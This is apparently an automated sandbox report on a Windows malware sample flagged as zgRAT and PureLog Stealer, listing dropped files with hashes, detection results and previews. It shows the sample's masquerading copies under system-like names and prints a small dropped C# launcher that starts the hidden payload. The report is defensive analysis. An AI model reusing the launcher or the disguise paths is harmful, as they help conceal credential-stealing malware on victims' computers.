                                                                                              Entropy (8bit):5.9083492739862695
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:BjnuspVGOSXYofGhQtL+QA5DWDfxV+ZpuTXgUX:1usbGdX0hU+QA5iDfxV+fk
                                                                                              MD5:7232B301ECD8F65EA6E763A92327B05D
                                                                                              SHA1:82EAA41187F08121E3A0CD776E482C44EAD3D92C
                                                                                              SHA-256:BD8587A6A27EACAF74F0ABAD9F7DAA680AA93D42646F0302C3A6CED53D2EC611
                                                                                              SHA-512:42A8BD3FE518DDF1DDC17D2DC1D037FB059A2CBCEA200C3FB89CB79F2E258D5C54FFFE00D2B04003B975D5DF8FABA882F41A4DC992FAFAB5FF50071380D28FC4
                                                                                              Malicious:false
                                                                                              Preview:q5DGMMujcW7nAbvesx4PIw5rH0hAU17XrhlI1B3It8SNaNlus9Tpkxp39W9WptOlYj5c0mmq4vgKesR3OxRVhRx42sJfChd9tqz0SJ4GWnuyRfYRFGI1b3DGwBkIdHoXRhbx2alE3L94h8mXT2Z6YmhznsEQjvmO8XguDkYofD7Q3JjxYMylrs8p9lKKVUfHiv5Jb2TsdvaVoR6dIQ1W7BgPZ1ucaNSKi0rINaWg3FH6RnBrprBFdIKhOqukI0SPcQwykxPs3Vd14k8vzCxsLNrapK4hpwXCw1eB0NH1bTLIoSmor8uFDjDOjWIa2sDH7aECF65m55R2BivWhQzqCS8NyPceFr9tPEKOOkivDHKISLNAlv2m2WEob1OzebhN6im7XhI6rEm4I04nCb2TyW039gwWWsQmk6MuiPmEm64ytKgl6lwCiNZjrt71uvk9xAULoKExzyq2bCJz9Kau5NEWgmCySuT1V5AtzV6wg9NuhhHpkI2jVzDk68oCIQeEezggBZ9oOnO6ATz9eWOJ2tgf2ax1q4nQfJPrAlnKJOVrlHkmIphvBVMvTBnlmH7TA8a0EH82sEAnYy3v0KsAX1OK7eY87ChBQCrnqthBqoD7UiXeH2vcY66ItQ3kt94qg9XVHQFHmrUsyRzYH41FRFmTFj3Zz7SqtWbULBW0xozqmNTcbfdzIzZaWDQiWpRpZo9czeNFhASnQ5r2Pb8Udch47A8HuyeHWJR8O1m6RXRHhwKbVYS5r7M6GEfzgFUtgKQGotnYyBCFLaWK0gwWfjaY7U2JVxZLCilWf

                                                                                              C:\Program Files\Windows Defender\en-GB\conhost.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...

                                                                                              C:\Program Files\Windows Defender\en-GB\conhost.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0b9ce8fe, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                              Category:dropped
                                                                                              Size (bytes):1310720
                                                                                              Entropy (8bit):0.42212946737467094
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                              MD5:7D103537742EA9835F052F2D56F2CD9A
                                                                                              SHA1:D57E5FDABBD5787EC4E276FE75CE4B4354EA7DDB
                                                                                              SHA-256:D453A022884A49777A60D266F2EC86A429E97F53DF66920F344EB87F6B13E4F7
                                                                                              SHA-512:0135292D6A22CD525B84434FE86DBEA077E86FCF2C8DF0D4DF21820B309160274F022BDC516549FFA3E650D5AB7CA15FB1C11FC7D0A3B1C54801E2A011B936A4
                                                                                              Malicious:false
                                                                                              Preview:....... .......A.......X\...;...{......................0.!..........{A.!....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{......................................"....|..................r..?"....|%..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Recovery\495e0f92d6994d

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with very long lines (992), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):992
                                                                                              Entropy (8bit):5.918147909173836
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:wPKXnFAs7vflSgBeq/QE2xJ8O09/j6Qz7IEr8mDNXlGciFMCygUD6i75Da:wwnJflSjqQxeO09b6UZrbpXlGciFocik
                                                                                              MD5:A8DC2F4C1BB09182FEC5AA1AB28CE02E
                                                                                              SHA1:ABECD85CF120B1562EA405A112F97143CFEE0783
                                                                                              SHA-256:65DC38D6A488A47A6DB4D4D69417CCAB3B7F3DEEF90BBB0BF76EFDE11691E126
                                                                                              SHA-512:8A73AB577907EBD69B7FDA57B79CAD8940E3BC7C67A468C06066CF90D365DD525FCBE34B6EC23A3261FDCE2907E48B087FCCBC3FCDB843F2E558F550AE088EC8
                                                                                              Malicious:false
                                                                                              Preview:VaJ8AptdybpUY8hBE2iXCjgvbMdogmFmRQnZ8BxYG8SBwzYxk9Gp2f7v3XhxLE7MVCDHVIDCFKRDRf9mxpEgfauvT1gle9NBAGptvRcc6EksO3eXX49fAar5SRydmciF7QCKzQ0gNmkbzBhZXINj9rAkZubed9zefeu70ThHDdSYzPFQuYFdO8GPQcvFyWDNwG5VRjiEkFfgZlvJoKtE4WPhYerYhcSrZEmtUu9LzA3Jck0oqmbon8TZ0X7w2JgIwyGU9By3LhO3dGFxoDr5AoEavM36xNTpevWnegopxhcFuZ6tSJHzclHHupixI2G7OjZrtbTHYCHcL8qVPJonFeN2oO3y71h5be0LAPA009aado6v8Mh8Nc2uVgDeieKgeMBqHfVAJyxFDxZ9SH0uTir8mGzeLfSVz45QmPnc1hzZpwqhHDMaoZM5eCEBq1ynfbPJ1IXDdX2wtSTzaRWHS1qZrAwjKmwAsL3Nhhq9qI6RgZMMtPkYerUou0b1Wx31k2EhYFS3lXaK4Z3Rxj05BXgA0PcqFyn3PFqoVoyo6rxGRKtV6JDw67zMWDrJmlxxug5zsO5JuL8UkZtqfHu5u06RQeSS6oCV49WuP4nsO4Bv9fl6TBof11D4jnjO6nNGJnZlD9akdBr0yLSu2V95AhdC6bKmVZvkq5lVFA3TkDBzKMGXUyVlnSFmJXolzyPEQGJ2k6p1bpU7fo2tVwRgDJ6Y09MrWSewx7iDDOxXIdK87HGef4QChtAGJuCku8fJLhKiFyqH93Yk98bs2rMbCbPE7b4SMMnK8BxZ7iZrOIDnUaHKTTrCvDGtSGkn3X5wPNl8LBuUSeN3YlthUt92ekY44EH17vx0NRXHyJ9SiXuR0NUqXDTKYCRpzrEH33XgrWpHOmsLtqTH0HDqtae3cncL9sRHE2Yp9NjeiNcvUHartJyrnXXdZdDE3dHfUlG1SnHmhjIg8siVMvcz3jdrf5QgKflEF6at

                                                                                              C:\Recovery\VTixufCejPQZEvXiB.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...

                                                                                              C:\Recovery\VTixufCejPQZEvXiB.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Users\Public\AccountPictures\cc11b995f2a76d

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with very long lines (915), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):915
                                                                                              Entropy (8bit):5.90912122412152
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:jYXggSZcUECQPqZXGXWvqM9xz1F1X2JwU:jYtSZrEziXGbsz1F03
                                                                                              MD5:2FA963C6F8DF0F487E8722863213E5FB
                                                                                              SHA1:D1059E595DF000E3753FCDD58EC79A87400E5813
                                                                                              SHA-256:9FE7C03D36F2AF2419C4C9745DBDA84D2B38A805E9973FEBEA6512ED251304B6
                                                                                              SHA-512:C2177B49356A7315CCCE8F1E8B6A8983173BB8AAD5FE680CC994A2BD4AD1B38EDA3DF3AE6A7F66526811AF2124BD97B52C55C62EF60C8CCDCBFF68742838D176
                                                                                              Malicious:false
                                                                                              Preview:GvqsU9AT8N7u1JT1dCBm0Dmy9pwuJmldue1iMbByZ2EVomn3cvQ1EDDCJ1soMPJVmeAXSvpCBNN88RKXB2RYVuYrayZUsWmJsstJmPlrGOz1zFE1rVnT8uA2FS7eVUTolDPQiAuwRjSH4h1UuhnXtSK7s0ETSHWv4LQvzyTqk1CZc37ibmtxq65S3Rhr6adJNhMsRGe6O6w2Qvfz3f2pXjE7P72iQmuKX2L5qORVIxjtKDCHvsyaiywncPdTN6plMmeXjkJoOhgjAVxM5vwiyTliGicbv8HLI7hiiohLjKMARMnHbQXcJHx3A6RBHr2QaUbCxOoRNl9oGlQ34V9fkpBAJnilWfD1R6k6ukTNlGOiIJwYpYHvsXpuTa3JqC5riHWKAUITCv3ead2A1J68YRI4QznUrJhjKhAAwmXVPyt6dLUzi3SgG7TQ9b3Lqyl3OUT3d2NPwlskhMbFeywy0AcNNtBUsMpbMzrI1bWpqCufOtsxAxq2CxCO1Gpt12gj6RXreSODbGIyQ78eANU5fxYYxdRvvmyygKi7VBSsjna5pO73HLtnhlEJ284ABdRyRUSFYBI95mW2WdtjfXnk3LQ4GZEWGSqGWloV62eGCts5PMwZPVeozq5GDX986v2m5PgvyYmn2hhKdUo4npHvxCQpqhRi3fJQ1FA9qBk0s1wRIumtsEVRoHz390EQHDtWXRTXUpOmERC5Q8g55i0yK2mtPHAz6TtoHZ41bPZD0tMXE3mAUIVjN5LfojHNpZpviYx0EodpIx8bqPpWe9fx7JaMNZM2HMXbDbzqFw5pppaa7uyZ3vsp42xY7lmpcli6ZhYPa8QrDzIStAPdkw8VdshLobteKQMEHdBZWj94fBlEtfo6WIFpmNdq9Nk9PwhxmEKQ8zHAxDzbGcbJwwH

                                                                                              C:\Users\Public\AccountPictures\winlogon.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\AccountPictures\winlogon.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\AccountPictures\winlogon.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...

                                                                                              C:\Users\Public\AccountPictures\winlogon.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\4si9noTBNw.exe.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1396
                                                                                              Entropy (8bit):5.350961817021757
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                              MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                              SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                              SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                              SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                              Malicious:true
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\VTixufCejPQZEvXiB.exe.log

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe
                                                                                              File Type:CSV text
                                                                                              Category:dropped
                                                                                              Size (bytes):847
                                                                                              Entropy (8bit):5.354334472896228
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                                                              Download File
                                                                                              Process:C:\Program Files\Windows Defender\en-GB\conhost.exe
                                                                                              File Type:CSV text
                                                                                              Category:dropped
                                                                                              Size (bytes):847
                                                                                              Entropy (8bit):5.354334472896228
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\winlogon.exe.log

                                                                                              Download File
                                                                                              Process:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              File Type:CSV text
                                                                                              Category:dropped
                                                                                              Size (bytes):847
                                                                                              Entropy (8bit):5.354334472896228
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):1.1940658735648508
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:NlllulJnp/p:NllU
                                                                                              MD5:BC6DB77EB243BF62DC31267706650173
                                                                                              SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                              SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                              SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                              Malicious:false
                                                                                              Preview:@...e.................................X..............@..........

                                                                                              C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.0.cs

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                              Category:dropped
                                                                                              Size (bytes):396
                                                                                              Entropy (8bit):5.027815362919274
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LALiFkD:JNVQIbSfhV7TiFkMSfhWLAGFkD
                                                                                              MD5:35710B0D0ED56EF65BD2D72C6B8C0594
                                                                                              SHA1:BA6457E4B1F8F43EAC529A26139610CA8520F917
                                                                                              SHA-256:EBF0ABF2D6D6A132EE7828710F43BD81AC217257AE944462098CAAC412DE0449
                                                                                              SHA-512:825A7EBA6CF0A9B160008B1B33035F5147F4207C0ED8ECF6EE2D8E1115DD239CB5F8376BABE489DBD12DDF21C61B106D6D2C192B1D8D6BA67C2A1B8FBD82ECE4
                                                                                              Malicious:false
                                                                                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"); } catch { } }).Start();. }.}.

                                                                                              C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):250
                                                                                              Entropy (8bit):5.0969475734432095
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fGs:Hu7L//TRq79cQWfB
                                                                                              MD5:392AD6DE7E740840BEFFE95B89C7574E
                                                                                              SHA1:DFA0A7BB7FBE356D886C6372E0882A4A129A3108
                                                                                              SHA-256:5B8A79C9D90C907B9FEC8B59C1F36EC69E4675D306A798E27D3AC35E12E75059
                                                                                              SHA-512:E98F39EDA7568D6FE35308DF4C70F53B361DC9201E1DF98E04C02C64D7CA5E6200015E5C2C26126937F60C72542C102A5642EAD0AF63C8C477A3D9877CA17BCF
                                                                                              Malicious:true
